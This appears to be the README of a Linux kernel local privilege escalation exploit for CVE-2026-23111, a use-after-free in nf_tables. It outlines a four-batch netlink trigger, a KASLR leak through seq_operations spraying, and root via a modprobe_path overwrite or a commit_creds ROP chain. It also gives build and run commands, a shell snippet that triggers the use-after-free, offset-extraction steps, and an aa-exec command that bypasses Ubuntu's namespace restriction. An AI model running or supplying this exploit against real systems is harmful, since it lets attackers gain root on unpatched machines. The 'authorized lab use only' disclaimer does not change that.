Exploit for Use After Free in Linux Linux_Kernel CVE-2026-23111

## https://sploitus.com/exploit?id=58E729A1-1305-508A-A366-27ECA7ADF232
# CVE-2026-23111 Auto-Root (VM Testing)

Local privilege escalation exploit for **CVE-2026-23111** — Linux kernel `nf_tables` use-after-free via inverted `!` in `nft_map_catchall_activate()`.

**Authorized VM/lab use only.** Do not run on production systems.

## Vulnerability Summary

| Item | Detail |
|------|--------|
| Bug | `nft_map_catchall_activate()` skips inactive catchall on abort |
| Effect | `chain->use` not restored → refcount drain → UAF |
| Requirement | Unprivileged user namespaces + nftables |
| Targets | Ubuntu 22.04/24.04, Debian Bookworm (pre-patch kernels) |

## Quick Start (on vulnerable Linux VM)

```bash
# Copy project to VM
scp -r cve-2026-23111-exploit user@vm:~/

# On VM
cd ~/cve-2026-23111-exploit
chmod +x run.sh extract_offsets.sh
./run.sh
```

Or manually:

```bash
sudo apt install gcc libc6-dev   # Debian/Ubuntu
make
./cve-2026-23111 -p ubuntu-22.04
```

## 4-Batch Trigger (critical)

Matches Exodus Intelligence + FuzzingLabs reproduction:

1. **Batch 1**: `DELSET triggermap` + `DELSET bonjour` (fails → abort phase)
2. **Batch 2**: `NEWCHAIN dummy` (toggle generation cursor)
3. **Batch 3**: `DELSET holdmap` (clean delete)
4. **Batch 4**: `DELCHAIN victim` (freed chain, dangling GOTO ref → UAF)

## Exploitation Stages

1. **UAF trigger** — 4-batch netlink sequence
2. **KASLR bypass** — spray `seq_operations` via `open("/proc/self/stat")`, leak via `NFT_MSG_GETRULE`
3. **Root** — `modprobe_path` overwrite (needs correct offsets) or `commit_creds` ROP

## Kernel Offsets

Example offsets in `offsets.h` for Ubuntu 22.04 and Debian Bookworm. **You must verify on your VM.**

Generate local offsets (as root on VM):

```bash
sudo sh -c 'echo 0 > /proc/sys/kernel/kptr_restrict'
sudo ./extract_offsets.sh > offsets.local.h
make local
./cve-2026-23111
```

For ROP gadgets, use `ropper`/`rp++` on `vmlinux` or `/boot/vmlinuz-*`.

## Ubuntu 24.04 Note

Unprivileged user namespaces may be restricted. Bypass:

```bash
aa-exec -p trinity -- ./run.sh
```

## Files

| File | Purpose |
|------|---------|
| `exploit.c` | Main exploit (trigger + leak + escalate) |
| `nft_helpers.c/h` | Netlink nftables batch helpers |
| `offsets.h` | Example kernel symbol offsets |
| `extract_offsets.sh` | Dump symbols from `/proc/kallsyms` |
| `Makefile` | Build static binary |
| `run.sh` | One-shot compile + run |

## Verify Vulnerability (no exploit)

```bash
unshare -Urmin sh -c '
  nft add table inet t
  nft add chain inet t c
  nft add map inet t m { type ipv4_addr : verdict \; }
  nft add element inet t m { * : goto c }
  nft add map inet t trig { type ipv4_addr : verdict \; }
  nft add element inet t trig { * : goto c }
  nft -f - <<EOF
delete map inet t trig
delete map inet t nope
EOF
  nft delete map inet t m
  nft delete chain inet t c
  nft list maps
'
```

Corrupted map output (`goto`) indicates UAF.

## References

- [Exodus Intelligence — Off By !](https://blog.exodusintel.com/2026/06/08/off-by-exploiting-a-use-after-free-in-the-linux-kernel/)
- [FuzzingLabs reproduction](https://fuzzinglabs.com/repro-cve-2026-23111/)
- [NVD CVE-2026-23111](https://nvd.nist.gov/vuln/detail/CVE-2026-23111)

## Caveats

- Offsets are **kernel-build specific** — always run `extract_offsets.sh`
- Full ROP (`commit_creds`) requires additional heap shaping not fully automated here
- Patched kernels (post 2026-02-05) are **not vulnerable**
- Stability ~80–99% depending on system load (per Exodus)